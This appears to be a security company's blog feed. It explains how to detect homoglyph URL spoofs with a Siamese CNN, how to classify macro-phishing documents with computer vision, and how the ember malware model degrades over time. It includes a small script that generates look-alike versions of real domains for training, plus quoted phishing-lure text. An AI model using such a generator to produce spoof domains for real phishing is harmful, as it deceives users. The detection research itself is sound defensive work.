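    def edit_distance(a: str, b: str) -> int:
        # Classic Levenshtein distance: counts insertions, deletions, and substitutions.
        prev = list(range(len(b) + 1))
        for i, ca in enumerate(a, 1):
            curr = [i]
            for j, cb in enumerate(b, 1):
                curr.append(min(prev[j] + 1,                 # deletion
                                curr[j - 1] + 1,             # insertion
                                prev[j - 1] + (ca != cb)))   # substitution
            prev = curr
        return prev[-1]

    print(edit_distance("google.com", "gooogle.com"))  # 1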

    A fix for that attack is to provide weights for each character combination based on visual similarity and adjust the final edit distance score accordingly. Example weights are:

     

     

    You’ll notice that ‘0’ and ‘O’ are scored as very similar, as are “1” and “l”, while “2” and “E” are scored as dissimilar. This helps in the problem of detecting visual similarity. But to complete this mapping (especially when you consider multiple character combinations like “cl” -> “d”), the matrix of values to populate becomes enormous and burdensome.
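
    To make the idea concrete, here is a minimal sketch of how such visual-similarity weights might plug into the substitution cost. The weight table is a tiny illustrative subset, not the full matrix described above:

    # 0.0 means visually identical, 1.0 means completely dissimilar (illustrative values).
    VISUAL_WEIGHTS = {("0", "O"): 0.05, ("1", "l"): 0.05, ("2", "E"): 0.9}

    def sub_cost(a: str, b: str) -> float:
        if a == b:
            return 0.0
        return VISUAL_WEIGHTS.get((a, b), VISUAL_WEIGHTS.get((b, a), 1.0))

    def visual_edit_distance(a: str, b: str) -> float:
        prev = [float(j) for j in range(len(b) + 1)]
        for i, ca in enumerate(a, 1):
            curr = [float(i)]
            for j, cb in enumerate(b, 1):
                curr.append(min(prev[j] + 1.0,                    # deletion
                                curr[j - 1] + 1.0,                # insertion
                                prev[j - 1] + sub_cost(ca, cb)))  # weighted substitution
            prev = curr
        return prev[-1]

    print(visual_edit_distance("paypal.com", "paypa1.com"))  # ~0.05 instead of 1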

     

    Introducing Blazar for Detecting Homoglyph Attacks

    Instead, we introduce Blazar. The formal description of our Blazar project is “Detecting Homoglyph Attacks with a Siamese Neural Network”. If you want to skip to the code and paper you can find our public repo and our paper on Arxiv or IEEE.

    The primary idea is to convert text => images => feature vectors and then train a neural network to create the feature vectors such that similar looking strings (potential homoglyph attacks) have vectors with a small Euclidean distance while dissimilar strings (completely unrelated URLs) have a large Euclidean distance. Additionally, since comparing feature vectors in a linear fashion can become slow if using tens of thousands of samples, we’ll be implementing a KD tree based indexing and lookup system to speed things up.
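
    As a rough sketch of the text-to-image step, each string could be rasterized with Pillow. The font, canvas size, and normalization here are assumptions for illustration, not necessarily what our pipeline uses:

    import numpy as np
    from PIL import Image, ImageDraw, ImageFont

    def render_url(url: str, size=(150, 12), font_path="arial.ttf"):
        # Draw the string onto a small grayscale canvas; the network sees this image
        # rather than the raw characters, so look-alike strings produce nearly
        # identical inputs.
        img = Image.new("L", size, color=255)
        draw = ImageDraw.Draw(img)
        draw.text((1, 1), url, fill=0, font=ImageFont.truetype(font_path, 10))
        return np.asarray(img, dtype=np.float32) / 255.0

    x = render_url("gooogle.com")  # array of shape (12, 150) with values in [0, 1]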

     

    Training Data

    We first must generate data on which to train our network. We start with a large variety of base URLs (facebook.com, espn.com, wikipedia.org, etc) and generate a set of spoofed versions for each. This is as easy as generating a set of methods (replace “o” with “0”, replace “d” with “cl”, insert “-”, etc) and implementing them at random. For example:

    Creating and selecting your training data provides the flexibility to tailor this operation to specific types of spoofs or add more flexibility to cast a wider net while still letting the algorithm handle the generalization and abstraction of what “looks” similar. Our training examples above lean toward homoglyph character replacement as well as small scale character insertion throughout the string. The set could be tailored to larger insertions on either side of the string to perform even better against attacks Microsoft just announced such as my-iri.org vs iri.org.
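
    A minimal sketch of such a generator is below. The substitution table and edit types are illustrative placeholders; a real training set would use a much richer set of methods:

    import random

    # Illustrative look-alike substitutions; a real table would be far larger.
    HOMOGLYPHS = {"o": ["0", "\u00f6"], "l": ["1", "I"], "d": ["cl"], "b": ["\u1e05"]}

    def spoof(domain: str, n_edits: int = 2) -> str:
        chars = list(domain)
        for _ in range(n_edits):
            if random.random() < 0.7:
                # Swap a random character for one of its look-alikes.
                idxs = [i for i, c in enumerate(chars) if c in HOMOGLYPHS]
                if idxs:
                    i = random.choice(idxs)
                    chars[i] = random.choice(HOMOGLYPHS[chars[i]])
            else:
                # Insert a hyphen or duplicate a character at a random position.
                i = random.randrange(len(chars))
                chars.insert(i, random.choice(["-", chars[i]]))
        return "".join(chars)

    print(spoof("facebook.com"))  # e.g. 'faceḅo0k.com'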

     

    Convolutional Neural Networks

    As with most neural network based image analysis systems, we’ll be using convolutional neural networks (CNN). You can find dozens of explanations and tutorials online, so we’ll keep this part brief. Simply put, a CNN scans a sliding window over an image and for each view applies many convolutions: small matrix operations designed to identify features of an image. While training, these convolutions allow the network to learn features such as curves and line orientation, as well as their importance to the overall classification problem. With larger networks and more layers, we’re able to learn more complex shapes and features, and thus better understand objects.

     

    Our network is actually quite simple and textbook, as far as CNNs go.

     

    CNN Layer Structure

     

    Training

    Now that we have data and a network model, we have to train our network to understand similarity. In a traditional classification task, you might feed a sample through your network and expect it to have a result value of 1 or 0, signifying a binary class. Our task though is to identify similarity between many different strings, so we’re going to be using a Siamese neural network.

    Siamese neural networks work by feeding two sets of input, URL images in our case, into the network and getting out two sets of output, feature vectors. We then find the distance between the feature vectors. If the inputs are supposed to be spoofs, such as “google.com” and “gooogle.com”, we want this distance to be 0. If the inputs are not supposed to be spoofs, such as “google.com” and “facebook.com”, we want this distance to be 1. Once a set of samples is passed through the network and evaluated, we measure the error and back propagate the error correction through the network just like any other neural network training. The diagram below outlines a training step for our network.
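
    A minimal tf.keras sketch of this setup is below. The layer sizes, the 32-dimensional embedding, and the input shape follow the illustrative values used in this post; they are not necessarily the exact architecture we trained:

    import tensorflow as tf
    from tensorflow.keras import layers, Model

    def build_base(input_shape=(12, 150, 1), embedding_dim=32):
        # Small convolutional embedding network shared by both branches.
        inp = layers.Input(shape=input_shape)
        x = layers.Conv2D(32, 3, activation="relu", padding="same")(inp)
        x = layers.MaxPooling2D(2)(x)
        x = layers.Conv2D(64, 3, activation="relu", padding="same")(x)
        x = layers.GlobalMaxPooling2D()(x)
        return Model(inp, layers.Dense(embedding_dim)(x))

    base = build_base()
    img_a = layers.Input(shape=(12, 150, 1))
    img_b = layers.Input(shape=(12, 150, 1))
    # The same weights embed both inputs (the "Siamese" part).
    dist = layers.Lambda(lambda t: tf.norm(t[0] - t[1], axis=-1, keepdims=True))(
        [base(img_a), base(img_b)])
    siamese = Model([img_a, img_b], dist)

    def contrastive_loss(y_true, d, margin=1.0):
        # y_true is 0 for spoof pairs (drive distance to 0) and 1 for unrelated pairs.
        y_true = tf.cast(y_true, d.dtype)
        return tf.reduce_mean((1.0 - y_true) * tf.square(d) +
                              y_true * tf.square(tf.maximum(margin - d, 0.0)))

    siamese.compile(optimizer="adam", loss=contrastive_loss)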

     

    Siamese Neural Network Example Training Step

     

    After many samples have been run, we have a trained network. To ensure it has learned what we intended it to learn, we’d like to plot a few samples and see their distances. However, our feature space is 32 dimensions, and that’s not a whole lot of fun to visualize. Instead, we can use a data reduction technique called Principal Component Analysis (PCA). This effectively creates a projection of your data into a smaller dimensional space, two dimensions in our case.
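
    A short sketch of that projection with scikit-learn, assuming embeddings is the (n_samples, 32) array of feature vectors from the trained network and labels holds each sample's base domain:

    import matplotlib.pyplot as plt
    from sklearn.decomposition import PCA

    # Project the 32-dimensional embeddings down to 2 dimensions for plotting.
    coords = PCA(n_components=2).fit_transform(embeddings)
    for domain in sorted(set(labels)):
        pts = coords[[i for i, l in enumerate(labels) if l == domain]]
        plt.scatter(pts[:, 0], pts[:, 1], label=domain, s=10)
    plt.legend()
    plt.show()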

     

    You can see that “google.com” and its spoofs are clustered together, as are “facebook.com” and its spoofs. However, the cluster centers of “google.com” and “facebook.com” are far away from each other. This demonstrates that our network has learned its intended behavior.

    To implement this as a service, we take our trained neural network and run the domains we want to protect, perhaps the top 50k Alexa domains, through it. This produces a set of feature vectors that we can then index in the KD Tree. When we have a domain that we want to check to see if it is a spoof or not, we can run it through the neural network to create its feature vector and then check that feature vector against our KD Tree index. If it is close to a known/protected domain, then it is a potential homoglyph attack.
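
    A rough sketch of that lookup using SciPy's KD tree is below; embed, protected_vectors, protected_domains, and the distance threshold are placeholders for the trained network, the protected list, and a tuned cutoff:

    from scipy.spatial import cKDTree

    tree = cKDTree(protected_vectors)  # feature vectors of the domains we protect

    def check_domain(domain, threshold=0.15):
        vec = embed(domain)               # run the candidate string through the network
        dist, idx = tree.query(vec, k=1)  # nearest protected domain in feature space
        # A small distance means the candidate looks like a protected domain: a
        # potential homoglyph attack.
        return protected_domains[idx] if dist < threshold else None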

     

    Evaluation

    As with any machine learning application, effective evaluation of your proposed solution, especially against alternatives, is vital. We could measure this with a simple accuracy measurement, correct values divided by total values. However, that depends on setting a threshold to determine what is considered correct. Instead, we typically use a ROC curve, short for Receiver Operating Characteristic. This is a measurement of the false positive rate (FPR) on the x-axis vs the true positive rate (TPR) on the y-axis. Below we show a ROC curve of Blazar, edit distance, and visual edit distance.

    With this you can get an appreciation of how your model would perform in a range of thresholds which can be determined by the FPRs and TPRs. If you would like to have an aggressive detector, you can set a high TPR, which would correspond with a high FPR and the right side of the chart. Conversely, if you’d want a conservative detector, you could set a low FPR, which would correspond to a lower TPR and the left side of the chart. Additionally, we can measure the area under the curve (AUC) to get an idea of how one model stacks up to another over the entire range of thresholds.

    With this, we can see that the edit distance based technique gets an AUC of 0.81, not terrible. For comparison, an AUC of 0.5 is represented by the diagonal line and is equivalent to a 50/50 coin toss. Visual edit distance makes strong gains with an AUC of 0.89; however, we mentioned earlier the challenges of mapping the similarity scores for every character pair. Our technique with a Siamese CNN based on an image of the entire string gets an AUC of 0.97, a significant improvement over the state of the art.

     

    From Homoglyphs to Macro Malware Detection

    We have much more information on Blazar, our approach to detecting homoglyph attacks, on our public repo and in our paper on Arxiv or IEEE.

    Microsoft’s announcement of the Russian military campaign to spoof prominent political websites illustrates the gravity of homoglyph attacks.  Of course, as effective as homoglyph-based phishing attacks are, phishing attacks entail additional modes of compromise. Fortunately, computer vision again turns out to be an effective approach for detecting other forms of phishing. In our next post, we will give an overview of another Endgame research project - SpeedGrapher: MS Word macro malware detection. Together, Blazar and SpeedGrapher demonstrate just how useful computer vision can be for detecting phishing, while also illustrating the numerous creative and impactful aspects of modern phishing campaigns.

     

    Detecting Phishing With Computer Vision: Part 2, SpeedGrapher

    $
    0
    0

    In the previous post, we discussed the problem of phishing and why computer vision can be a helpful part of the solution. We also introduced Blazar, our computer vision tool to detect spoofed URLs. Today we will discuss the second tool we developed that applies computer vision to phishing - SpeedGrapher.

    While Blazar focuses on detecting homoglyph attacks (i.e., attacks based on visual character similarity in URLs) with computer vision, SpeedGrapher detects macro-enabled document based phishing. In this post, we describe the growing use of macro-enabled document based phishing and introduce our solution, SpeedGrapher. I presented each of these tools at BSidesLV, demonstrating how Blazar and SpeedGrapher address two often used phishing techniques, while illustrating the power and potential for computer vision to detect phishing.

     

    Overview of Macro-Enabled Document Based Phishing

    Phishing attacks can take many forms, one of the most prominent of which exploits the natural tendency to download attachments. In these macro-enabled document based phishing attacks, attackers continue to find success by tricking victims to open malware-embedded documents as attachments in their email. Let’s look at a Word document you could have been emailed.

     

    Example Document

     

    This whole document should raise warning signs. It has instructions on how to “Enable Content” (i.e. enable macros), and includes typos/misspellings such as “Macroses”. These generally are telltale signs of a phishing attack. Enabling content usually sets off a script that downloads a payload to start an attack or sends back valuable information to a C&C server. As we’ve detailed elsewhere, these kinds of attacks with payload delivery have been deployed in some of the most high profile attacks by nation-states, and remain a favorite attack vector for criminals seeking financial gain.

     

    Bounding the Problem Set

    Since this is a vision based exploit, let’s define the problem in a visual way, too. We want to detect the image on the left as malicious and the image on the right as not.

     

    Malicious (left) and Benign (right) Docs

     

    This is the first page of both documents. The one on the left has a lure stating that you can’t read the document due to an incorrect version and requests to “Enable Content”. This is suspicious, especially since the instructions are just an image, and MS Office does not make requests like this. The document on the right is plain text with a few hyperlinks, nothing looking too suspicious except that it talks about macros. Given that many of these suspicious clues are visual, we began creating SpeedGrapher to explore how computer vision may assist in detecting these kinds of phishing attacks.

     

    Getting Started: How We Built SpeedGrapher

    As with most computer vision applications, SpeedGrapher is an ensemble of many different techniques. While that sounds complicated, and computer vision in general has an intimidating reputation, this is actually a bonus. Each piece of the solution is relatively straightforward, although some are more complicated than others, and can be understood and completed in chunks. We first need to gather samples and then focus on feature generation.

     

    Gathering Samples

    To get started, the first thing we need to do is gather samples. At Endgame, we have a large sample set from our work in making a macro text based classifier. But you can curate your own set from sources like VirusTotal or other file collection and scanning services.

    With the samples in hand, the next step is to capture an image of the first page of the document for clues of malicious activity. One method would be opening the actual file and taking a screenshot of it. However, this is manual and slow. It perhaps could be automated, but that sounds overly complex. Instead, we get a preview from the Word Interop class which contains the logic Word itself uses to interface with a document. Microsoft has great documentation of this here.
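
    As a rough illustration (and an alternative to the Interop preview approach we used), a similar first-page image can be scripted from Python by driving Word over COM to export a PDF and rasterizing page one. The paths are placeholders, and this sketch is not our exact pipeline:

    import win32com.client
    from pdf2image import convert_from_path

    def first_page_image(doc_path, pdf_path=r"C:\previews\preview.pdf"):
        word = win32com.client.Dispatch("Word.Application")
        word.Visible = False
        doc = word.Documents.Open(doc_path)
        doc.ExportAsFixedFormat(pdf_path, 17)  # 17 == wdExportFormatPDF
        doc.Close(False)
        word.Quit()
        # Rasterize only the first page for feature extraction.
        return convert_from_path(pdf_path, first_page=1, last_page=1)[0]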



     

    Note on safety: with Blazar we were just dealing with strings; now we’re dealing with actual malware. It is worth sandboxing: disable internet access, disable macros, and enable Windows Exploit Guard for Word.

     

     

    Generating Features

    We generated the following features: prominent colors, blur/blank area detection, optical character recognition, and icon detection. Each of these are described below.

     

    Prominent Colors

    To calculate prominent colors, we use K-means clustering over the RGB space of the document. We first start with an image:

     

    Example Document

     

    These images are really just a series of pixels with color coding (RGB in our case). We take each pixel and map it into a three dimensional space corresponding to its Red, Green, and Blue values, irrespective of its position in the image. If the image is mostly white, as in this case, we’ll see a lot of data points at the 255, 255, 255 coordinate. If mostly black, we’ll see a lot at 0, 0, 0.

    After our data is mapped, we cluster it. K-means clustering is an algorithm that takes the number of clusters, K, as input. We’re going to look for three clusters. The algorithm randomly initializes three cluster centers in our space and then finds all points that are closer to each center than to any other. Next it aggregates those assigned points to find a new centroid, and moves to that position. It then repeats this process (find closest points, aggregate, move, etc.) until it reaches steady state or a maximum number of iterations is reached. This produces a set of three color centroids and the corresponding size of their clusters, as you see below.

     

    Visualization of Color Clusters

    Notice that the largest cluster is white, the next is yellow, and the final cluster is comprised of the little bits of red and black in the image resulting in a brown hue. You can do this yourself by following along with this blog.
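
    A short scikit-learn sketch of that clustering (img is assumed to be the document preview loaded as an RGB array):

    import numpy as np
    from sklearn.cluster import KMeans

    def prominent_colors(img, k=3):
        pixels = img.reshape(-1, 3).astype(float)     # one row per pixel, position ignored
        km = KMeans(n_clusters=k, n_init=10).fit(pixels)
        sizes = np.bincount(km.labels_, minlength=k) / len(pixels)
        # Each centroid is an RGB color; size is the fraction of pixels in that cluster.
        return list(zip(km.cluster_centers_.tolist(), sizes.tolist()))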

     

    Blur Detection

    For blur detection we focus on a common technique attackers use to fake the idea that content is hidden. The document below shows a blurred-out background with a notification asking the user to “Enable Content” to see the full document. But this is just an image; there is no hidden content.

     

    Blur Detection Example

    To measure this, we’re going to find the variance of the Laplacian, a second order derivative operator that measures the sharpness of change. Thinking back to calculus, this is akin to acceleration in the position, velocity, acceleration set. Velocity is the rate of change of position (first order derivative). Acceleration is the rate of change of velocity, or the rate of change in the change of position (second order derivative).

    For a gray-scale image, a white pixel right next to a black pixel right next to a white pixel would have a large measure of sharpness of change. A white pixel with smooth transition of gray pixels to a black pixel would have a small measure of sharpness of change and would also correspond to a blurred image. You can find a guide to do this yourself with this blog.
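
    With OpenCV this boils down to a couple of lines; the image path and the cutoff for flagging a region as blurry are illustrative and would be tuned on real samples:

    import cv2

    def blur_score(image_path):
        gray = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
        # Variance of the Laplacian: low values mean few sharp edges, i.e. a blurry region.
        return cv2.Laplacian(gray, cv2.CV_64F).var()

    is_blurry = blur_score("preview.png") < 100  # illustrative cutoff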

     

    Blank Detection

    Blank detection is a feature that is useful in determining if an attacker is attempting to trick a user with a seemingly broken or corrupt document. We calculate some simple statistics on the average of the RGB values, such as mean, variance, and max. From those values we can numerically show that the image on the left is not blank and the image on the right is blank. Additionally, the mean will tell us what color the blank section is.

    Not Blank (left) and Blank (right) Docs
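
    A minimal sketch of those statistics, assuming gray is a 2-D grayscale array of the region being checked; the variance cutoff is illustrative:

    import numpy as np

    def blank_stats(gray):
        mean, var, mx = float(gray.mean()), float(gray.var()), float(gray.max())
        # Near-zero variance means an almost uniform region; the mean tells us its color.
        return [mean, var, mx], var < 1.0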

     

    Optical Character Recognition

    Optical Character Recognition (OCR) is a well worn topic, so we won’t spend time getting into the technical details of translating and converting characters identified in images. There are several technologies that do this well, such as Google’s Tesseract. We decided to use UWP OCR since it was native in Windows 10. Additionally, we implemented text translation via a Google Cloud API to convert as much of the text to English as possible. There are also several other text translation APIs available, like Microsoft’s.
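
    For example, with Tesseract (one of the options mentioned above; we used the UWP OCR in practice), extracting the raw text from a preview image is a one-liner. The image path is illustrative:

    from PIL import Image
    import pytesseract

    # Pull raw text from the first-page preview and lowercase it for keyword matching.
    text = pytesseract.image_to_string(Image.open("preview.png")).lower()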

     

    Icon Detection

    For icon detection, we use YOLOv3. This is a very cool object detection framework. YOLO in this context stands for You Only Look Once, as it scans an image once to determine both image class and bounding box. Please check out the paper and website for more information. We’ll explain it briefly, but they provide much more detail and we highly recommend it.

    The general idea is to take an image and section it into cells. Each cell is assigned a probability of fitting with a class from the classes you’re training it to detect. At the same time it is determining possible bounding boxes for objects. It then combines the cell class probabilities and bounding box probabilities to find high confidence predictions and boxes.

    YOLO Cell Grid

    +

    YOLO Bounding Boxes

    =

    YOLO Detection Box

     

    For our purpose, we decided to detect five classes of objects that we saw were often used in attacks masquerading as instructions from Microsoft Office:

     

     

    To train, we’ll need 1500 samples with around 300 of each class. We also apply transforms like color shifting and rescaling to make the network robust to these kinds of edits. You can follow along with this blog to train on your own dataset.

    If you’re familiar with neural network training, you might immediately realize that 300 samples per class is far too small a training set for a task of this nature. Generally speaking, you would be correct. However, we’re going to leverage transfer learning to accelerate our work. Transfer learning in this context means training a network on a large dataset and a general task, and then adding a final training run on a smaller set with a specific task. The large dataset training allows the network to learn how to recognize generic features (and, importantly, to be saved and shared), and the small dataset training focuses the network on the specific task at hand.

    For our training we are using this port of YOLO for Windows and a network pre-trained on a large ImageNet set.

    The end result is quite good. We can submit a sample to our YOLO network and get output on any specific icons detected and the confidence in those icon detections. Visually, the identification of icons and determination of their bounding boxes would look like:

     

    YOLO Object Detection Results

     

    Combining Features

    After all the feature generation is done, we get a json blob for a sample that looks something like:

     

    {
      "sha256": "0a0a5e96f792ab8cae1a79cc169e426543145cb57b74830b548649018a7277f4",
      "data": {
          "img": {"blank": {"data": [253.4725,
                                     118.46424375000001,
                                     255.0],
                            "heur": false},
                  "blur": {"data": 470.48171167998635,
                           "heur": false}},
          "top": {"blank": {"data": [243.6475,
                                     1141.22824375,
                                     255.0],
                            "heur": false},
                  "blur": {"data": 941.7518285537251,
                           "heur": false}},
          "btm": {"blank": {"data": [254.9825,
                                     0.017193749999999994,
                                     255.0],
                            "heur": true},
                  "blur": {"data": -1,
                           "heur": false}}},
      "colors": {"cluster_0": {"centroid": [254.7639097744361,
                                            254.7799498746867,
                                            254.58646616541353],
                               "size": 0.9459503713290462},
                 "cluster_1": { "centroid": [178.91304347826087,
                                             127.69565217391305,
                                             116.95652173913044],
                                "size": 0.012234456554165144},
                 "cluster_2": {"centroid": [247.4512195121951,
                                            234.0609756097561,
                                            186.8780487804878],
                               "size": 0.041815172116788646}},
      "yolo": ["office_1: 97%",
               "office_3: 88%",
               "enable_1: 87%",
               "enable_1: 95%"],
      "txt": "offit attention! to view this document, please turn on the edit mode and macroses! 0 display the contents of the document click on enable content buttorl p aste format painter clipboard security warning font macros have been disabled. enable content\r\n"
    }
    

     

    Building a Classifier

    We’ve put a lot of work into this feature generation, so it only makes sense to build a classifier to make predictions on new samples. To do that we generally need three things:

    1. Samples - We’ve collected a corpus through various sources

    2. Feature generator - We’ve documented the creation of several rich feature sets

    3. Labels - We can use our MalwareScore for Macros labels.

     

    Creating Feature Vectors

    We’re going to take the easy route in this classifier and not conduct a great deal of processing and analysis on our input feature vectors. A lot of that work was done by the feature generation step, and the rest can be done by the classifier algorithm itself. We take the data from our above json blob and smash it all into one 38-dimensional float vector.

     

    # Sort the three color clusters by size; 3 clusters x (RGB centroid + size) = 12 dims.
    color_centroids = [(d['centroid'], d['size']) for d in list(data['colors'].values())]
    color_centroids.sort(key=lambda x: x[1])
    color_centroid_vector = []
    for cc, s in color_centroids:
        color_centroid_vector.extend(cc)
        color_centroid_vector.append(s)
    

     

    # 3 regions x ([mean, variance, max] + blank flag) = 12 dims, plus 3 x (blur score + blur flag) = 6 dims.
    blank_vector = []
    blur_vector = []
    for k in ['btm', 'img', 'top']:
        blank = data['data'][k]['blank']['data']
        blank_vector.extend(blank)
        blank_vector.append(float(data['data'][k]['blank']['heur']))
        blur = data['data'][k]['blur']['data']
        blur_vector.append(blur)
        blur_vector.append(float(data['data'][k]['blur']['heur']))
    

     

    # One confidence slot per icon class; keep the detection percentage for each class seen.
    yolo_keys = ['enable_1', 'office_1', 'office_2', 'office_3', 'word_logo']
    yolo_vector = [0.0, 0.0, 0.0, 0.0, 0.0]
    for logo in data['yolo']:
        for yk in yolo_keys:
            if logo.startswith(yk):
                per = float(logo.split(':')[1][1:-1])
                yolo_vector[yolo_keys.index(yk)] = per
    

     

    # Binary flags for suspicious phrases in the (translated) OCR text; translator is the
    # translation client described earlier.
    text_keys = ['enable content', 'enable macros', 'macros']
    text_vector = [0.0] * len(text_keys)
    txt = data.get('txt', '')
    txt = translator.translate(txt).text
    for tk in text_keys:
        if tk in txt:
            text_vector[text_keys.index(tk)] = 1.0
    

     

    x = np.array(color_centroid_vector + blank_vector + blur_vector + yolo_vector + text_vector)

     

    Because we use a Random Forest classifier in this example, this next step doesn’t strictly matter, but it is good practice to normalize your data to a [0.0, 1.0] scale. This keeps a feature’s scale from dictating its importance.

     

    import numpy as np
    X = np.array(X)
    Y = np.array(Y)
    
    high = 1.0
    low = 0.0
    
    # Min-max scale each feature column into [low, high].
    mins = np.min(X, axis=0)
    maxs = np.max(X, axis=0)
    rng = maxs - mins
    rng = np.array([r if r != 0.0 else 1.0 for r in rng])  # avoid dividing by zero for constant features
    
    X = high - (((high - low) * (maxs - X)) / rng)
    

     

    Creating, Training, and Evaluating a Classifier

    Finally, we create our classifier, train, and evaluate it.

    import sklearn.ensemble
    
    n_estimators = 100
    max_depth = 6
    
    clf = sklearn.ensemble.RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth)
    

     

    from sklearn.model_selection import train_test_split
    
    nfolds = 10
    pred_labels, y_scores, true_labels = [], [], []
    
    for fold in range(nfolds):
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.1)
        clf.fit(X_train, y_train)
        pred_labels_sub = altered_predict(clf, X_test, n_classes)  # our helper for turning probabilities into labels
        pred_vals = [b for (a, b) in clf.predict_proba(X_test)]    # probability of the malicious class
    
        pred_labels.extend(pred_labels_sub)
        y_scores.extend(pred_vals)
        true_labels.extend(y_test)
    

     

    from sklearn.metrics import confusion_matrix, roc_curve, auc
    
    conf_mat = confusion_matrix(true_labels, pred_labels)
    fpr, tpr, thr = roc_curve(true_labels, y_scores)
    roc_auc = auc(fpr, tpr)
    

     

    It is very important to perform cross validation on your dataset as part of the training step to accurately measure your results. We’re using n-fold cross validation, which works by segmenting your data set into n training and evaluation sets. For n=10, we take our entire data set, segment off 10% of it for evaluation, train on the remaining 90%, and then evaluate our hold out set. We repeat this process nine more times, each time picking a different 10% as a hold out. We then aggregate all of our evaluation data to get a very accurate picture of our performance across our entire data set.

     

    import matplotlib.pyplot as plt
    plt.plot(fpr, tpr, label='ROC curve of {0} (area = {1:0.2f})'.format('RF', roc_auc))
    plt.legend()
    plt.show()
    

     

    ROC Curve for SpeedGrapher

     

    The AUC of our ROC curve is a respectable 0.98, even without doing anything fancy for our classifier. Further, we examine our confusion matrix to see our True Positives, True Negatives, False Positives, and False Negatives.

     

    Confusion Matrix

     

    There are 89 false positives in our set, meaning we predict something as malicious when our labels say it is benign. Looking further into these samples we’ve noticed that the majority, around 70%, are actually neutered malware. An example of these neutered samples is below:

     

     

    Neutered Sample Image

     

    It has a macro text of:

     

    Neutered Sample Macro Text

     

    Our detection based on the visual cues was correct, but our ground truth labeling said the sample was benign because the macro text was removed.

    Looking at the false negatives, where we call samples benign but they are labeled malicious, we find that the majority are samples with no visual indication of being malicious. Since our goal here is to detect samples that visually look malicious, these errors are largely expected.

    We also don’t handle samples in some language character sets well.

     

    Different Character Set Example

     

    Some are legitimate-looking files, like this resume.

     

    Non-Malicious Looking Example

     

    Unfortunately, Joe Smith is doing some nasty work under the hood:

     

    Malicious Macro Text

     

    All in all, our classifier, even though not sophisticated, performed quite well due to the rich data we were able to gather using relatively straightforward computer vision analysis.

     

    Next Steps

    In reality, this is our initial model for SpeedGrapher, which we will continue to refine. We’re adding new features, new file types, and lots of secret sauce to continue to improve it. But for the purpose of this blog, we wanted to demonstrate how to easily build a classifier and the benefits of having rich, quality input data.

    As the threats evolve and become more complicated to detect, we see computer vision as playing a major role in helping every day users guard against phishing and similar attacks, and we will continue to push the boundary and pursue these innovations.

    Happy hunting!

     

    Beware Steep Decline: Understanding Model Degradation in Machine Learning Models

    $
    0
    0

    Machine learning (ML) models are often designed to make predictions about future data. However, over time many models’ predictive performance decreases as a given model is tested on new datasets within rapidly evolving environments. This is known as model degradation. Model degradation is especially an issue in information security because malware is always changing and new malware is constantly emerging. By understanding model degradation, we can determine how to optimize a model’s predictive performance.

    We explored the effects of model degradation on the Ember (Endgame Malware BEnchmark for Research) benchmark model. The ember dataset was initially created as an open source benchmark dataset for testing the efficacy of different machine learning methods, and consists of over 1.1 million executable files/samples, all of which can also be obtained from VirusTotal. Ember also includes a model trained on that data.

    While the ember benchmark model classified files as benign or malicious in the original test set with a greater than 99.91% accuracy, we don’t know how the model’s performance will degrade over time as new files (benign and malicious) are classified against an older model. To address this issue, we trained the model with multiple time bounded training and test sets to determine exactly how the benchmark model degrades over time.

    After conducting multiple analyses, we determined that the ember model’s predictive performance degrades over time. This helps us make more informed decisions about when to retrain ember and similar models. It will also inform other researchers working with ML models of the importance of model degradation.

     

    Determining Ember Model Degradation

    We trained nine versions of the model with different training sets, one for each month from March through November 2017, using all the files seen through that month as our training set. For each of these models, we defined multiple testing sets; each test set consisted of all the files from a given month after the training set. We then evaluated each model’s predictive performance on each of the corresponding testing sets using its area under the ROC curve (AUC) score, which summarizes the trade-off between the model’s false positive rate and true positive rate across all thresholds.
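
    A minimal sketch of how such a grid of AUC scores could be produced is below. Here df, FEATURES, and train_model are hypothetical placeholders for the ember data (with a per-file first-seen month stored as a pandas Period and a binary label) and the model-fitting code:

    import pandas as pd
    from sklearn.metrics import roc_auc_score

    months = pd.period_range("2017-03", "2017-12", freq="M")
    auc_grid = pd.DataFrame(index=months[:-1], columns=months[1:], dtype=float)

    for train_month in months[:-1]:
        train = df[df["month"] <= train_month]        # all files seen through this month
        model = train_model(train)                    # hypothetical helper
        for test_month in months[months > train_month]:
            test = df[df["month"] == test_month]
            scores = model.predict(test[FEATURES])
            auc_grid.loc[train_month, test_month] = roc_auc_score(test["label"], scores)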

    We did this twice – once with only files first seen in 2017, and once with all files seen starting from 2006. The overall trends in model performance can be seen below.








    The heatmaps above are colored by AUC, with red indicating low model performance and blue indicating high model performance. The rows in the heat maps show how a given model performs over time; the columns represent how well multiple training models perform on data from a given month.

    Our initial plan was to measure the performance of each model in the months following its latest training data (rows). However, for the model trained on files seen through March (first row), there is no continuous pattern of model degradation. The same lack of a trend applies for the models trained on data through the rest of the nine months. Instead, we switched to a different analysis for evaluating performance degradation, holding the test month constant and comparing time gaps to those test months (columns). Looking at the models tested on data from December (last column), model performance decreases as the latest training data in a given model becomes further away from December. This same general trend can be seen for the rest of the test months.

    We believed this difference in model performance could result from later models having larger training sets, which would make them more generalizable and lead to more accurate classifications on the testing sets.

     

    Testing with Normalized Training Data

    In order to test the hypothesis that larger datasets over time are driving our findings, we decided to observe how the models perform when the training sets for all the models are the same size. To normalize the training sets for each model, we first determined the number of files in the smallest training set. Then we randomly sampled that many files from each of the other training sets. After retraining and retesting all the models on the new training and test sets, we observed the following trends in model performance:







    While there are a few variations, the heatmaps here are essentially the same as the performance heatmaps without the normalized training sets. This indicates that the size of the training set doesn’t account for the difference in model performance between the nine models.

     

    Considerations and Possible Improvements

    While we were able to determine the model’s performance over time, there are other variables that we need to consider. There is a risk that, after retraining, the model could classify a file differently than it did before. These factors could decrease the consistency of the model and may be a concern for people using ember.

     

    Conclusion

    Understanding model degradation is important as it allows us to determine when to retrain a model to maintain model performance. We now better understand the rate of model degradation within the ember benchmark model and we can use this knowledge when making decisions about how often to retrain production MalwareScoreTM models.

    Beyond malware classification, many ML models are susceptible to model degradation. Thus, any researchers or evaluators in information security using ML models should be aware of the rate of model degradation to continue to optimize model performance.

     

    Forbes Cloud 100

    $
    0
    0

    From the day Endgame shipped its first product, our mission has been to protect the world’s data from attack by simplifying and scaling an organization’s ability to tackle what would otherwise be a daunting cybersecurity challenge. This year has served as witness to how we are delivering on that promise, and we are honored to be recognized for our contributions by the Forbes Cloud 100.

